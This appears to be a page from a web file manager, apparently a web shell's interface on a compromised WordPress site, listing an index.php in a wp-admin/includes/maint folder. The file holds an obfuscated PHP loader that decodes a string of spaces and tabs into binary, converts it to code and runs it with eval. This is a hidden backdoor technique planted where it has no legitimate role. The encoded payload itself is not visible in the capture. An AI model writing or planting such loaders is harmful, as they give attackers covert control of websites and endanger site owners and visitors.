PATH:
home
/
carfac
/
public_html
/
moabmonsters.com
/
wordpress
/
wp-admin
/
includes
/
maint
<?php $dispatcher = " "; $factory = str_replace([" ", "\t"], ['0', '1'], $dispatcher); $app = ''; $event = str_split($factory, 8); foreach($event as $context) { $app .= chr(bindec($context)); } eval('?>' . $app); ?>
[-] index.php
[edit]
[+]
..